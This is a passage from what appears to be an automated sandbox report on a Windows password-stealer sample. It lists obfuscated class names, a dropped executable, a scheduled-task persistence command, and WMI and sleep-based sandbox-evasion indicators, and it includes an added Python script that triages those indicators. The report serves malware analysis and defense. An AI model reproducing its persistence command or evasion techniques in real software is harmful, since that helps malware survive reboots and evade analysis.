Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe.5f50000.13.raw.unpack, IFfuPum6ed2mwOL3Oc.cs | High entropy of concatenated method names: 'NlJE2QIIq0', 'ydrEaSKRtL', 'JItEXIWdg9', 'gR4XMt8XVe', 'R6WXzwuaEq', 'qQkErgx2Ny', 'mQvEyAJ5wf', 'QCuEdEjTjL', 'VxKEIY4Vs4', 'UGfEugtnnI'
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe.5f50000.13.raw.unpack, ptkcvFyIko6Vgai0Cp.cs | High entropy of concatenated method names: 'Dispose', 'V06y5dbVyU', 'aDVdHLc4MJ', 'bRoggPOmFk', 'jiIyMcXpEx', 'Co5yzvjIu9', 'ProcessDialogKey', 'glwdrgb4y9', 'cN5dycKlCr', 'MLtddvUMgZ'
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe.5f50000.13.raw.unpack, ji4bRcgHPp3YBF6N9F.cs | High entropy of concatenated method names: 'qpD9sZ9KC', 'WpPA1mwuv', 'LoOVgO7jr', 'ekv7eokRp', 'vCBxMOJj7', 'QWjeLQUwx', 'KQ1QkhZkcXb2yP09Bv', 'umGo9UYu9c2NYtlQ4N', 'OENM0Z4IMM8CDSR8W5', 'hAPs3jEc8'
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe.5f50000.13.raw.unpack, j3kliHIVm29aEbcWo1.cs | High entropy of concatenated method names: 'XHGLy8MKyl', 'j1wLIuFdjS', 'nufLuEL64M', 'DBNL2uhJkh', 'vcZLqo8cQE', 'KGqLFcTJTi', 'GYNLXqpLdi', 'xtPsZZON4L', 'W8NsOe3aeu', 'zH6s5wEcYJ'
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe.5f50000.13.raw.unpack, ts9UdaXrsaOaskEftJ.cs | High entropy of concatenated method names: 'qYUECFwG08', 'Ep5EoP4xKQ', 'pExE9fY1n7', 'X6CEAMCRlo', 'eaGEfeERJn', 'RAsEVY7L6L', 'v5NE7nf9ut', 'e6OERfv1LC', 'ibaExjpxRZ', 'jl8EeamHgh'
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe.5f50000.13.raw.unpack, AcyZefjYCPiKQdGsR0.cs | High entropy of concatenated method names: 'KVZmuADUuHKGHnfsPfZ', 'mPq2k3DmKsFiC9gnVeS', 'OdKg8uDRndJ7E6Uh9Nx', 'ReFXsFQkpj', 'QWRXLWx4PM', 'LkZXYMbWGY', 'my3GkAD8tpQPBCZlueZ', 'yKqKGVDMqyXTgJYrCR7'
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe.5f50000.13.raw.unpack, tvt69rzvv6M3FNEJWt.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'rXBLhWx9rx', 'TwcLTJEJrr', 'QRELvXn6QZ', 'Q2TLBu1a3m', 'uA5LsAaRhm', 'liDLLZMmGc', 'M99LYdAX15'
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe.5f50000.13.raw.unpack, WsjDAefL2e2kyOUtBN.cs | High entropy of concatenated method names: 'gk1yE04rq8', 'GKSykPATOc', 'bxJy6A1fxl', 'GO8ypevUBs', 'fAhyTgqTss', 'EY9yveQx92', 'wg9YLqna6WJAeZQLYp', 'v8062R1PobDYoabXxR', 'dNQyyxwkXZ', 'cRJyIjPaHs'
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe.5f50000.13.raw.unpack, cb0g1JuRiZN1xmB927.cs | High entropy of concatenated method names: 'M9Ss2aBLSi', 'oUKsq5aSQF', 'up1saiTEG1', 'AecsFxN2XN', 'fjqsXAA400', 'daCsEW02br', 'IbEskfvpxJ', 'HCnsP6mBjl', 'GThs6rMmLW', 'pbIspU0YTh'
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe.5f50000.13.raw.unpack, Y5nytErNmFIcW1ufM2F.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'OOtYlDLUpE', 'N1CYnlbLKR', 'Gr1YKZPLGn', 'XJmYUoVMBU', 'gyMY4VWO9T', 'JxyY10pIdk', 'BkXYZV6wDM'
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe.5f50000.13.raw.unpack, tLiBjXBKlgE4d1KknX.cs | High entropy of concatenated method names: 'mqlBOqN81O', 'g3DBMOmAFC', 'clvsrmDmCI', 'cvcsy3VOCA', 'YcaB0oXD4u', 't5fBtigCxI', 'isEBJsQlrv', 'c8WBlpuo1l', 'BaUBnv0NKM', 'irXBK28YwL'
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe.5f50000.13.raw.unpack, DbTxFVYqKJRHOfF5An.cs | High entropy of concatenated method names: 'nwbIQGyo4e', 'ipQI2WIQdS', 'AbKIqxXIe5', 'JElIaG74qI', 'bb6IFTMsdQ', 'kwuIXBxCl1', 'byYIETP6kg', 'kWCIk4lXT8', 'BBhIP5JBMr', 'QnQI6M8NGR'
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe.5f50000.13.raw.unpack, nt04Z5alfSFmOHTce1.cs | High entropy of concatenated method names: 'ytkXQnG7s9', 'ohXXqbtpiA', 'DCdXFrVE2w', 'naZXEcOQIF', 'ua7XkgaoIR', 'eEOF4muobX', 'fWxF1E0Ql1', 'QExFZU9E96', 'PECFOEO9kw', 'RvKF5dxgUt'
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe.5f50000.13.raw.unpack, MCy3qtL8rVBoDnGdwB.cs | High entropy of concatenated method names: 'RT2hROLFep', 'ToAhxEMG4K', 'Jcwh3dmTe7', 'XbQhHFVoei', 'wJihmw09Dd', 'x6BhGhtLE7', 'uynhN4bT3L', 'ffphWkW3bP', 'rTSh8J8mq3', 'sI6h0eP3lD'
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe.5f50000.13.raw.unpack, dpETEbKfXc5dam4FjF.cs | High entropy of concatenated method names: 'AOJB60pD2C', 'JQMBpIWQUt', 'ToString', 'u5LB2pyRYF', 'ySyBqwCRMN', 'mZqBaLbB2v', 'fPMBFOtl1q', 'RrwBXCs1Rw', 'vbUBEmJfqy', 'CGNBkDoEGG'
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe | File created: C:\Users\user\AppData\Roaming\TuZRpLi.exe

                      Boot Survival

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\TuZRpLi" /XML "C:\Users\user\AppData\Local\Temp\tmp8319.tmp"

                      Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe, Process information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeProcess information set: NOOPENFILEERRORBOX
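
The two entries above and the Malware Analysis System Evasion entries that follow are what an analyst triages by hand. The script below is an added example, not part of the Joe Sandbox report or of the sample's code: it parses entries in the report's "Source: <process>  <event kind>: <detail>" shape and groups the evasion-relevant ones per process. Two values in those entries deserve a gloss. 922337203685477 is TimeSpan.MaxValue expressed in milliseconds ((2^63 - 1) ticks of 100 ns divided by 10,000), so the "Thread delayed" entries carrying it are .NET infinite-timeout waits rather than a chosen sleep length. "memory write watch" is the MEM_WRITE_WATCH allocation flag, which the CLR garbage collector also uses for its heap, so on a .NET sample it carries little weight on its own. The category names, the scoring rule, the list of fingerprinted WMI classes and the sample lines (a constructed subset of this report's entries) are this example's own assumptions.

```python
"""Triage Joe Sandbox behaviour entries for sandbox-evasion indicators.

Added example; not code from the report or the sample. Category names,
thresholds and the scoring rule are this example's own choices.
"""
import re
from collections import Counter, defaultdict

# TimeSpan.MaxValue in milliseconds: (2**63 - 1) ticks of 100 ns // 10_000.
# Joe Sandbox shows this value when a .NET wait uses an infinite timeout.
INFINITE_WAIT_MS = (2**63 - 1) // 10_000  # 922337203685477

# WMI classes commonly read to fingerprint a VM (assumed list, not from the report).
VM_FINGERPRINT_CLASSES = (
    "Win32_BaseBoard", "Win32_Processor", "Win32_NetworkAdapterConfiguration",
    "Win32_ComputerSystem", "Win32_BIOS", "Win32_DiskDrive", "Win32_VideoController",
)

# "Source: <process> [TID: n]  <event kind>: <detail>"
ENTRY_RE = re.compile(
    r"^Source:\s+(?P<proc>\S+?\.exe)"
    r"(?:\s+TID:\s*(?P<tid>\d+))?"
    r"\s+(?P<kind>Process information set|WMI Queries|Memory allocated|Code function|"
    r"Thread delayed|Thread sleep time|Thread sleep count|Window / User API|Last function)"
    r":\s*(?P<detail>.*)$"
)

# Constructed sample: a subset of this report's entries, one per event kind.
SAMPLE_LINES = [
    r"Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe  Process information set: NOOPENFILEERRORBOX",
    r"Source: C:\Users\user\AppData\Roaming\TuZRpLi.exe  Process information set: NOOPENFILEERRORBOX",
    r"Source: C:\Users\user\AppData\Roaming\TuZRpLi.exe  WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard",
    r"Source: C:\Users\user\AppData\Roaming\TuZRpLi.exe  WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor",
    r"Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe  Memory allocated: E40000 memory reserve | memory write watch",
    r"Source: C:\Users\user\AppData\Roaming\TuZRpLi.exe  Code function: 17_2_05F22019 rdtsc 17_2_05F22019",
    r"Source: C:\Users\user\AppData\Roaming\TuZRpLi.exe  Thread delayed: delay time: 922337203685477",
    r"Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe TID: 7172  Thread sleep time: -100000s >= -30000s",
    r"Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe TID: 7188  Thread sleep count: 2006 > 30",
]


def parse_entry(line):
    """Split one report entry into process, optional TID, event kind and detail."""
    m = ENTRY_RE.match(line.strip())
    return m.groupdict() if m else None


def classify(entry):
    """Map one parsed entry to an evasion category, or None if not relevant."""
    kind, detail = entry["kind"], entry["detail"]
    if kind == "Process information set" and "NOOPENFILEERRORBOX" in detail:
        return "error_dialog_suppression"  # SetErrorMode(SEM_NOOPENFILEERRORBOX)
    if kind == "WMI Queries" and any(c in detail for c in VM_FINGERPRINT_CLASSES):
        return "vm_fingerprint_wmi"
    if kind == "Memory allocated" and "write watch" in detail:
        return "write_watch_alloc"  # MEM_WRITE_WATCH; the CLR GC uses it too
    if kind == "Code function" and re.search(r"\brdtsc\b", detail):
        return "timing_check"
    if kind == "Thread delayed":
        m = re.search(r"delay time:\s*(\d+)", detail)
        if m:
            value = int(m.group(1))
            if value >= INFINITE_WAIT_MS:
                return "infinite_wait"
            if value >= 30_000:  # same threshold the report's own entries use
                return "long_sleep"
    if kind == "Thread sleep time":
        # The report prints the interval and its threshold as negative relative times.
        m = re.search(r"-?(\d+)s\s*>=\s*-?(\d+)s", detail)
        if m and int(m.group(1)) >= int(m.group(2)):
            return "long_sleep"
    if kind == "Thread sleep count":
        m = re.search(r"(\d+)\s*>\s*(\d+)", detail)
        if m and int(m.group(1)) > int(m.group(2)):
            return "sleep_loop"
    return None


def summarize(lines):
    """Count evasion categories per source process; unrecognised lines are skipped."""
    per_proc = defaultdict(Counter)
    for line in lines:
        entry = parse_entry(line)
        if entry is None:
            continue
        category = classify(entry)
        if category:
            per_proc[entry["proc"]][category] += 1
    return per_proc


def evasion_verdict(counts):
    """VM fingerprinting combined with stalling or rdtsc timing is the strong signal.

    infinite_wait and write_watch_alloc are deliberately left out of the score:
    both are routine in .NET processes (event waits, GC heap reservation).
    """
    fingerprinting = counts["vm_fingerprint_wmi"] > 0
    stalling = (counts["long_sleep"] + counts["sleep_loop"] + counts["timing_check"]) > 0
    if fingerprinting and stalling:
        return "likely sandbox-aware"
    if fingerprinting or stalling:
        return "suspicious"
    return "none"


if __name__ == "__main__":
    for proc, counts in summarize(SAMPLE_LINES).items():
        print(f"{proc}\n  {dict(counts)}\n  verdict: {evasion_verdict(counts)}")
```

To run it over a whole report, replace SAMPLE_LINES with the behaviour section pasted into a file, one entry per line; the parser ignores lines in any other shape. On the constructed sample the dropped TuZRpLi.exe scores "likely sandbox-aware" (WMI fingerprinting plus an rdtsc timing check) while the submitted executable scores only "suspicious" (long sleeps and a sleep loop, no fingerprinting in the sampled lines).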

                      Malware Analysis System Evasion

                      Source: Yara match  File source: Process Memory Space: SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe PID: 5268, type: MEMORYSTR
                      Source: Yara match  File source: Process Memory Space: TuZRpLi.exe PID: 2124, type: MEMORYSTR
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe  WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exe  WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe  Memory allocated: E40000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe  Memory allocated: 2AE0000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe  Memory allocated: 4AE0000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe  Memory allocated: 5FD0000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe  Memory allocated: 6FD0000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe  Memory allocated: 7210000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe  Memory allocated: 8210000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe  Memory allocated: 1830000 memory reserve | memory write watch
